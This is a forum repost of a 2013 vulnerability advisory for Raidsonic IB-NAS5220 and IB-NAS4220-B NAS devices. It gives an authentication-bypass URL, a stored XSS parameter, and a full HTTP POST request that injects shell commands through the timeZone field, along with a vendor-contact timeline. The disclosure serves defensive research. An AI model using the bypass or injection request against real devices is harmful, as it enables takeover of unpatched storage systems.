Praetorian503 Posted February 14, 2013 Report Posted February 14, 2013 Raidsonic versions IB-NAS5220 and IB-NAS4220-B suffer from authentication bypass and persistent cross site scripting vulnerabilities.Device Name: IB-NAS5220 / IB-NAS4220-BVendor: Raidsonic============ Vulnerable Firmware Releases: ============Product Name IB-NAS5220 / IB-NAS4220-BTested Firmware IB5220: 2.6.3-20100206STested Firmware IB4220: 2.6.3.IB.1.RS.1Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip============ Vulnerability Overview: ============ * Authentication Bypass: -> Access the following URL to bypass the login procedure:http://<IP>/nav.cgi?foldName=adm&localePreference=en * Stored XSS: System -> Time Settings -> NTP Server -> User DefineInjecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.Example Exploit:POST /cgi/time/timeHandler.cgi HTTP/1.1Host: 192.168.178.41User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.41/cgi/time/time.cgiContent-Type: application/x-www-form-urlencodedContent-Length: 186month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.deAdvisory URL: http://www.s3cur1ty.de/m1adv2013-010Twitter: @s3cur1ty_de============ Time Line: ============August 2012 - discovered vulnerability27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B28.08.2012 - vendor responded that they will not publish an update15.10.2012 - contacted vendor with vulnerability details for IB-NAS522015.10.2012 - vendor responded that they will not publish an update12.02.2013 - public release===================== Advisory end =====================Source: PacketStorm Quote